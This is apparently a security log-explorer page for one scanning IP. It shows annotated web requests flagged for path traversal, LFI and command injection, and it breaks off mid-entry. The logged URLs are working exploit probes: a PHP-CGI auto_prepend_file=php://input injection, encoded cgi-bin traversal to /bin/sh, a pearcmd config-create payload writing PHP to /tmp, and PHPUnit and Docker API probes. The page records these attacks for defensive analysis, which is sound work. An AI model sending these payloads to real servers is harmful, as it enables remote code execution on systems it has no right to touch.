Log Explorer

Fact drill-down for 150.136.76.116
Risk: 19 (LOW) | Scope: All time | All-time facts: 198 | In-scope: 198 | Filtered: 198 | Seen: 2025-04-19 to 2025-05-19

Annotated access events

Showing page 1 / 4 — total 198 rows
# 2025-05-19 17:16:06 event 8042711 GET 404 bytes 28510
ann base label observed
Request event observed
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
referer
-
UA
Custom-AsyncHttpClient
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:16:04 event 8042705 POST 404 bytes 28510
ann trav 30 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
trav
rule
trav:wrapper
conf
94.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
referer
-
UA
Custom-AsyncHttpClient
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:16:04 event 8042705 POST 404 bytes 28510
ann base label observed
Request event observed
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
referer
-
UA
Custom-AsyncHttpClient
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:16:01 event 8042693 POST 301 bytes 178
ann trav 30 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
trav
rule
trav:wrapper
conf
94.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
referer
-
UA
Custom-AsyncHttpClient
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:16:01 event 8042693 POST 301 bytes 178
ann base label observed
Request event observed
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
referer
-
UA
Custom-AsyncHttpClient
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166
ann ua 8 label ua
Annotation facts
label
ua
rule
ua:very_short
conf
65.00
details
Short/generic UAs are common in basic scripts and commodity automation.
More (full fields + snapshot) expand
url
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh
referer
-
UA
-
summary
Very short User-Agent string
details
Short/generic UAs are common in basic scripts and commodity automation.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166
ann trav 26 label trav
Annotation facts
label
trav
rule
trav:mixed_separators
conf
90.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh
referer
-
UA
-
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166
ann trav 28 label trav
Annotation facts
label
trav
rule
trav:dotdot_slash
conf
92.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh
referer
-
UA
-
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166
ann trav 30 label trav
Annotation facts
label
trav
rule
trav:encoded_dotdot
conf
93.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh
referer
-
UA
-
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166
ann sfp 34 label sensitive_file
Annotation facts
label
sensitive_file
rule
sfp:traversal
conf
86.00
details
Traversal sequences were present (raw or encoded). Snippet='/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
More (full fields + snapshot) expand
url
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh
referer
-
UA
-
summary
Directory traversal indicator
details
Traversal sequences were present (raw or encoded). Snippet='/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh'
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166
ann proto 12 label proto
Annotation facts
label
proto
rule
proto:bad_percent_encoding
conf
72.00
details
A '%' not followed by two hex digits was detected. Often caused by fuzzers/scanners or broken clients; sometimes used for evasions.
More (full fields + snapshot) expand
url
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh
referer
-
UA
-
summary
Malformed percent-encoding in request target
details
A '%' not followed by two hex digits was detected. Often caused by fuzzers/scanners or broken clients; sometimes used for evasions.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:15:59 event 8042685 POST 400 bytes 166
ann base label observed
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh
referer
-
UA
-
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:15:57 event 8042675 POST 400 bytes 166
ann ua 8 label ua
Request Very short User-Agent string
referer
-
UA
-
Annotation facts
label
ua
rule
ua:very_short
conf
65.00
details
Short/generic UAs are common in basic scripts and commodity automation.
More (full fields + snapshot) expand
url
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
referer
-
UA
-
summary
Very short User-Agent string
details
Short/generic UAs are common in basic scripts and commodity automation.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:15:57 event 8042675 POST 400 bytes 166
ann trav 26 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
-
Annotation facts
label
trav
rule
trav:mixed_separators
conf
90.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
referer
-
UA
-
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:15:57 event 8042675 POST 400 bytes 166
ann trav 28 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
-
Annotation facts
label
trav
rule
trav:dotdot_slash
conf
92.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
referer
-
UA
-
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:15:57 event 8042675 POST 400 bytes 166
ann sfp 34 label sensitive_file
Request Directory traversal indicator
referer
-
UA
-
Annotation facts
label
sensitive_file
rule
sfp:traversal
conf
86.00
details
Traversal sequences were present (raw or encoded). Snippet='/cgi-bin/../../../../../../../../../../bin/sh'
More (full fields + snapshot) expand
url
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
referer
-
UA
-
summary
Directory traversal indicator
details
Traversal sequences were present (raw or encoded). Snippet='/cgi-bin/../../../../../../../../../../bin/sh'
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-19 17:15:57 event 8042675 POST 400 bytes 166
ann base label observed
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
referer
-
UA
-
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:12 event 16731445 GET 404 bytes 28510
ann base label observed
Request event observed
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/containers/json
referer
-
UA
Custom-AsyncHttpClient
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:12 event 16731444 GET 404 bytes 28510
ann base label observed
Request event observed
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/containers/json
referer
-
UA
Custom-AsyncHttpClient
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:11 event 16731443 GET 404 bytes 28510
ann trav 26 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
trav
rule
trav:mixed_separators
conf
90.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../tmp/index1
referer
-
UA
Custom-AsyncHttpClient
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:11 event 16731443 GET 404 bytes 28510
ann trav 28 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
trav
rule
trav:dotdot_slash
conf
92.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../tmp/index1
referer
-
UA
Custom-AsyncHttpClient
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:11 event 16731441 GET 404 bytes 28510
ann trav 26 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
trav
rule
trav:mixed_separators
conf
90.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../tmp/index1
referer
-
UA
Custom-AsyncHttpClient
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:11 event 16731441 GET 404 bytes 28510
ann trav 28 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
trav
rule
trav:dotdot_slash
conf
92.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../tmp/index1
referer
-
UA
Custom-AsyncHttpClient
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:11 event 16731443 GET 404 bytes 28510
ann sfp 34 label sensitive_file
Request Directory traversal indicator
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
sensitive_file
rule
sfp:traversal
conf
86.00
details
Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../tmp/index1'
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../tmp/index1
referer
-
UA
Custom-AsyncHttpClient
summary
Directory traversal indicator
details
Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../tmp/index1'
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:11 event 16731441 GET 404 bytes 28510
ann sfp 34 label sensitive_file
Request Directory traversal indicator
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
sensitive_file
rule
sfp:traversal
conf
86.00
details
Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../tmp/index1'
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../tmp/index1
referer
-
UA
Custom-AsyncHttpClient
summary
Directory traversal indicator
details
Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../tmp/index1'
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:11 event 16731443 GET 404 bytes 28510
ann base label observed
Request event observed
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../tmp/index1
referer
-
UA
Custom-AsyncHttpClient
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:11 event 16731441 GET 404 bytes 28510
ann base label observed
Request event observed
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../tmp/index1
referer
-
UA
Custom-AsyncHttpClient
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:10 event 16731438 GET 404 bytes 28510
ann trav 26 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
trav
rule
trav:mixed_separators
conf
90.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php
referer
-
UA
Custom-AsyncHttpClient
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:10 event 16731438 GET 404 bytes 28510
ann trav 28 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
trav
rule
trav:dotdot_slash
conf
92.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php
referer
-
UA
Custom-AsyncHttpClient
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:10 event 16731435 GET 404 bytes 28510
ann trav 26 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
trav
rule
trav:mixed_separators
conf
90.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php
referer
-
UA
Custom-AsyncHttpClient
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:10 event 16731435 GET 404 bytes 28510
ann trav 28 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
trav
rule
trav:dotdot_slash
conf
92.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php
referer
-
UA
Custom-AsyncHttpClient
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:10 event 16731438 GET 404 bytes 28510
ann sfp 34 label sensitive_file
Annotation facts
label
sensitive_file
rule
sfp:traversal
conf
86.00
details
Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-creat'
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php
referer
-
UA
Custom-AsyncHttpClient
summary
Directory traversal indicator
details
Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-creat'
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:10 event 16731435 GET 404 bytes 28510
ann sfp 34 label sensitive_file
Annotation facts
label
sensitive_file
rule
sfp:traversal
conf
86.00
details
Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-creat'
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php
referer
-
UA
Custom-AsyncHttpClient
summary
Directory traversal indicator
details
Traversal sequences were present (raw or encoded). Snippet='/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-creat'
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:10 event 16731438 GET 404 bytes 28510
ann base label observed
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php
referer
-
UA
Custom-AsyncHttpClient
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:10 event 16731435 GET 404 bytes 28510
ann base label observed
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php
referer
-
UA
Custom-AsyncHttpClient
summary
event observed
details
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:10 event 16731438 GET 404 bytes 28510
ann cmdi 22 label cmdi
Request Command/file-injection indicator: cmdi:pipe_or_redirect
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
cmdi
rule
cmdi:pipe_or_redirect
conf
75.00
details
Pipe/redirect operators in a context that resembles command execution. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php
referer
-
UA
Custom-AsyncHttpClient
summary
Command/file-injection indicator: cmdi:pipe_or_redirect
details
Pipe/redirect operators in a context that resembles command execution. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:10 event 16731438 GET 404 bytes 28510
ann cmdi 28 label cmdi
Request Command/file-injection indicator: cmdi:op_plus_cmd
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php
referer
-
UA
Custom-AsyncHttpClient
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:10 event 16731435 GET 404 bytes 28510
ann cmdi 22 label cmdi
Request Command/file-injection indicator: cmdi:pipe_or_redirect
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
cmdi
rule
cmdi:pipe_or_redirect
conf
75.00
details
Pipe/redirect operators in a context that resembles command execution. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'
More (full fields + snapshot) expand
url
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php
referer
-
UA
Custom-AsyncHttpClient
summary
Command/file-injection indicator: cmdi:pipe_or_redirect
details
Pipe/redirect operators in a context that resembles command execution. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'
subnet
150.136.76.0/24
asn
31898 — Oracle Corporation
geo
United States, Virginia, Ashburn
org
Oracle Cloud Infrastructure (us-ashburn-1)
# 2025-05-17 08:46:10 event 16731435 GET 404 bytes 28510
ann cmdi 28 label cmdi
Request Command/file-injection indicator: cmdi:op_plus_cmd
referer
-
UA
Custom-AsyncHttpClient
Annotation facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd& con'
url
/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php
referer
-
UA
Custom-AsyncHttpClient
summary
